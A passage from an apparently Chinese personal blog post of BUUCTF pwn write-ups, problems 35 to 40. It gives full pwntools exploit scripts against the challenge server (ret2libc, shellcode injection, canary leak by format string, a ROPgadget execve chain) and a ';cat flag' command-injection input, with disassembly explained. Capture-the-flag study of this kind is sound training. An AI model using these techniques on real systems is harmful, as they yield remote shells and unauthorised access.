class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;write&#x27;</span>,write_addr)</span><br><span class="line">libc_base=write_addr-libc.dump(<span class="string">&#x27;write&#x27;</span>)</span><br><span class="line">sys_add = libc_base + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh_add =libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload2 = payload + p64(rdi_add) + p64(binsh_add) + p64(sys_add)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="35-mrctf2020-shellcode"><a href="#35-mrctf2020-shellcode" class="headerlink" title="35 mrctf2020_shellcode"></a>35 mrctf2020_shellcode</h2><p><em><strong>ret2shellcode</strong></em></p>
<p>ida没法反编译了，这次读汇编（其实只要传入shellcode就行）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26947</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>接下来看一下汇编</p>
<p><img src="/./images/image-20250201215315053.png" alt="image-20250201215315053"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">buf= byte ptr -410h	;buf 表示相对于基指针 rbp 偏移量为 -410h 的一个字节内存位置</span><br><span class="line">var_4= dword ptr -4	;var_4 表示相对于基指针 rbp 偏移量为 -4 的一个双字（32 位，4 字节）内存位置</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">push    rbp</span><br><span class="line">mov     rbp, rsp</span><br><span class="line">sub     rsp, 410h</span><br></pre></td></tr></table></figure>

<p>这里是开辟0x410字节空间的栈</p>
<p>中间一部分应该是缓冲区设置，没看懂，但也不需要看懂，跳过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lea     rdi, s          ; &quot;Show me your magic!&quot;</span><br><span class="line">call    _puts</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>lea rdi, s</code>：将字符串 <code>&quot;Show me your magic!&quot;</code> 的地址加载到 <code>rdi</code> 寄存器中，作为 <code>_puts</code> 函数的参数。</p>
</li>
<li><p><code>call _puts</code>：调用 <code>_puts</code> 函数输出字符串，并自动添加换行符。</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">lea     rax, [rbp+buf]</span><br><span class="line">mov     edx, 400h       ; nbytes</span><br><span class="line">mov     rsi, rax        ; buf</span><br><span class="line">mov     edi, 0          ; fd</span><br><span class="line">mov     eax, 0</span><br><span class="line">call    _read</span><br></pre></td></tr></table></figure>

<ul>
<li><code>lea rax, [rbp+buf]</code>：计算相对于基指针 <code>rbp</code> 偏移量为 <code>-410h</code> 的内存地址，并将其加载到 <code>rax</code> 寄存器中，作为读取数据的缓冲区地址。</li>
<li><code>mov edx, 400h</code>：将读取的最大字节数 <code>400h</code> 加载到 <code>edx</code> 寄存器中。</li>
<li><code>mov rsi, rax</code>：将缓冲区地址传递给 <code>_read</code> 函数的第二个参数。</li>
<li><code>mov edi, 0</code>：将文件描述符 <code>0</code>（标准输入）传递给 <code>_read</code> 函数的第一个参数。</li>
<li><code>mov eax, 0</code>：将返回值寄存器 <code>eax</code> 清零。</li>
<li><code>call _read</code>：调用 <code>_read</code> 函数从标准输入读取最多 <code>400h</code> 字节的数据到缓冲区中。</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov     [rbp+var_4], eax</span><br><span class="line">cmp     [rbp+var_4], 0</span><br><span class="line">jg      short loc_11D6</span><br></pre></td></tr></table></figure>

<ul>
<li><code>mov [rbp+var_4], eax</code>：将 <code>_read</code> 函数的返回值（实际读取的字节数）保存到相对于基指针 <code>rbp</code> 偏移量为 <code>-4</code> 的内存位置（var_4)</li>
<li><code>cmp [rbp+var_4], 0</code>：比较实际读取的字节数是否为 <code>0</code>，用于后续的条件判断。</li>
<li><code>jg</code>基于前面 <code>cmp [rbp+var_4], 0</code> 指令设置的标志位进行判断。<code>[rbp+var_4]</code> 中存储的是 <code>_read</code> 函数实际读取的字节数，如果这个值大于 0，程序就会跳转到 <code>loc_11D6</code> 标签处继续执行；如果不满足条件（即读取的字节数小于等于 0），则继续顺序执行下一条指令。</li>
</ul>
<p><strong>若失败，即无读入（左边）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mov     eax, 0</span><br><span class="line">jmp     short locret_11E4</span><br></pre></td></tr></table></figure>

<ul>
<li><code>mov eax, 0</code>：将寄存器 <code>eax</code> 赋值为 0。在很多系统调用和函数返回中，<code>eax</code> 通常用于存储返回值，这里将其置为 0 表示程序以正常状态退出或者操作失败的返回码。</li>
<li><code>jmp short locret_11E4</code>：无条件跳转到 <code>locret_11E4</code> 标签处，跳过后续代码直接进入函数返回流程。</li>
</ul>
<p><strong>若成功，即有读入（右边）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">loc_11D6:                               ; CODE XREF: main+78↑j</span><br><span class="line">lea     rax, [rbp+buf]</span><br><span class="line">call    rax</span><br><span class="line">mov     eax, 0</span><br></pre></td></tr></table></figure>

<ul>
<li><code>loc_11D6</code>：这是一个代码标签，当满足 <code>jg</code> 跳转条件时会跳转到这里。</li>
<li><code>lea rax, [rbp+buf]</code>：<code>lea</code> 是加载有效地址指令，这里将相对于基指针 <code>rbp</code> 偏移量为 <code>-410h</code>（前面定义的 <code>buf</code>）的内存地址加载到 <code>rax</code> 寄存器中。</li>
<li><code>call rax</code>：这是一个间接调用指令，它会将程序控制权转移到 <code>rax</code> 寄存器所指向的地址处执行代码。</li>
<li><code>mov eax, 0</code>：同样将寄存器 <code>eax</code> 赋值为 0，可能用于表示函数的正常返回状态。</li>
</ul>
<p><strong>综上，可以很清楚的发现，直接往buf里面写入代码之后函数就会直接执行buf里的代码，所以直接注入shellcode就行</strong></p>
<h2 id="36-bjdctf-2020-babyrop2"><a href="#36-bjdctf-2020-babyrop2" class="headerlink" title="36 bjdctf_2020_babyrop2"></a>36 bjdctf_2020_babyrop2</h2><p><em><strong>格式化字符串+canary绕过+ret2libc</strong></em></p>
<p>我记得写过canary绕过的wp，忘了在哪了，再写一份吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26391</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line">put_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">put_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">pop_rdi=<span class="number">0x0400993</span></span><br><span class="line">main_addr=elf.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">vuln_addr=<span class="number">0x400887</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;help u!\n&#x27;</span>,<span class="string">b&#x27;%7$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(canary)</span><br><span class="line">payload = payload.rjust(<span class="number">0x20</span>,<span class="string">b&#x27;a&#x27;</span>)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(pop_rdi)+p64(put_got)+p64(put_plt)+p64(vul</span><br><span class="line">n_addr)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;story!\n&#x27;</span>,payload)</span><br><span class="line">put_addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,put_addr)</span><br><span class="line">libcbase=put_addr-libc.dump(<span class="string">&quot;puts&quot;</span>)</span><br><span class="line">system_addr=libcbase+libc.dump(<span class="string">&quot;system&quot;</span>)</span><br><span class="line">binsh_addr=libcbase+libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(canary)</span><br><span class="line">payload = payload.rjust(<span class="number">0x20</span>,<span class="string">b&#x27;a&#x27;</span>)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)+</span><br><span class="line">p64(vuln_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;story!\n&#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><strong>审题</strong></p>
<ul>
<li><p><code>checksec</code>一下，发现开启了NX和canary</p>
</li>
<li><p>ida看一下，直接去<code>gift()</code>函数</p>
<ul>
<li><p><img src="/./images/image-20250201232816600.png" alt="image-20250201232816600"></p>
</li>
<li><p>v2就是canary值（一会后面解释canary保护），距离rbp为<code>0x-8</code></p>
</li>
<li><p>这里还读入了format函数，格式化字符串试试，看看我们的第几个输入可以被解析为格式化字符</p>
</li>
<li><p>我是输入<code>aa%n$p</code>,一个个试过去，看看哪个对应出61，最后发现输入<code>aa%6$p</code>的时候输出为<code>aa0x702436256161</code>，说明：<strong>第六个参数可以被解析成格式化字符串</strong></p>
</li>
<li><p>接下来动态调试一下看看canary的值是哪个（不出意外就是后一个）</p>
<ul>
<li>在printf处下断点，然后run运行到断点处，输入aa，然后查看栈结构</li>
<li><img src="/./images/image-20250201233714092.png" alt="image-20250201233714092"></li>
<li>canary值（v2)在rbp-8处，而我们输入的aa在它的上面，所以canary值可以用<code>%7$p</code>打印出来</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="canary保护"><a href="#canary保护" class="headerlink" title="canary保护"></a><strong>canary保护</strong></h3><p>简单来说，就是程序在开始运行前从一块只读数据中读出来一个随机数存在栈底（rbp上面一个），然后返回的时候看看栈底这个数变了没，变了就说明被栈溢出了，程序中断。</p>
<p>而想要绕过也很简单，只需要我们将canary的值读出来，在构造payload的时候放在它本来就该在的位置就好了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload = p64(canary)	<span class="comment"># 写入canary值</span></span><br><span class="line">payload = payload.rjust(<span class="number">0x20</span>,<span class="string">b&#x27;a&#x27;</span>)	<span class="comment"># buf距离rbp为0x20，所以直接将canary和垃圾数据一起填满这32字节</span></span><br></pre></td></tr></table></figure>

<p><em>后面3就是正常的ret2libc了，都写烂了要，不说了</em></p>
<h2 id="37-babyheap-0ctf-2017"><a href="#37-babyheap-0ctf-2017" class="headerlink" title="37 babyheap_0ctf_2017"></a>37 babyheap_0ctf_2017</h2><p>施工施工，heap先等等</p>
<h2 id="38-bjdctf-2020-router"><a href="#38-bjdctf-2020-router" class="headerlink" title="38 bjdctf_2020_router"></a>38 bjdctf_2020_router</h2><p>考察linux下的命令机制</p>
<h4 id="命令一；命令二这样的格式会执行两种指令"><a href="#命令一；命令二这样的格式会执行两种指令" class="headerlink" title="命令一；命令二这样的格式会执行两种指令"></a><code>命令一；命令二</code>这样的格式会执行两种指令</h4><p><img src="/./images/image-20250202230419710.png" alt="image-20250202230419710"></p>
<p>ida里面一看，<code>system(dest)</code>,前面还有一段将<code>buf</code>拼接到dest后面，那直接输入<code>;cat flag</code>秒了，exp都不用。直接nc</p>
<h2 id="39-inndy-rop"><a href="#39-inndy-rop" class="headerlink" title="39 inndy_rop"></a>39 inndy_rop</h2><p><strong>rop一把梭</strong>*</p>
<p>打开ida一看，这么多函数，这么明显的溢出，直接ropchain一把梭</p>
<p><code>ROPgadget --binary pwn --ropchain</code>直接可以生成rop链，把溢出填充好就直接用就行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#r = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">29636</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(r)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># execve generated by ROPgadget</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack</span><br><span class="line"></span><br><span class="line"><span class="comment"># Padding goes here</span></span><br><span class="line">p = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0xC</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span></span><br><span class="line"></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea060</span>) <span class="comment"># @ .data</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080b8016</span>) <span class="comment"># pop eax ; ret</span></span><br><span class="line">p += <span class="string">b&#x27;/bin&#x27;</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea064</span>) <span class="comment"># @ .data + 4</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080b8016</span>) <span class="comment"># pop eax ; ret</span></span><br><span class="line">p += <span class="string">b&#x27;//sh&#x27;</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080492d3</span>) <span class="comment"># xor eax, eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0805466b</span>) <span class="comment"># mov dword ptr [edx], eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080481c9</span>) <span class="comment"># pop ebx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea060</span>) <span class="comment"># @ .data</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080de769</span>) <span class="comment"># pop ecx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806ecda</span>) <span class="comment"># pop edx ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080ea068</span>) <span class="comment"># @ .data + 8</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x080492d3</span>) <span class="comment"># xor eax, eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806c943</span>) <span class="comment"># int 0x80</span></span><br><span class="line"></span><br><span class="line">r.sendline(p)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="40-jarviso-level4"><a href="#40-jarviso-level4" class="headerlink" title="40 jarviso_level4"></a>40 jarviso_level4</h2><p><em><strong>ret2libc</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;i386&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28452</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">main = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(write_plt)+p32(main)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">0x4</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;write&#x27;</span>,write_addr)</span><br><span class="line">libc_base = write_addr-libc.dump(<span class="string">&#x27;write&#x27;</span>)</span><br><span class="line">log.info(<span class="string">&#x27;libc_base:&#x27;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">sys = libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(sys)+p32(<span class="number">0</span>)+p32(binsh)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%881-20%E9%A2%98%EF%BC%89/" rel="prev" title="">
                  <i class="fa fa-angle-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/04/buuctf/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%8841-60%E9%A2%98%EF%BC%89/" rel="next" title="">
                   <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Maple</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
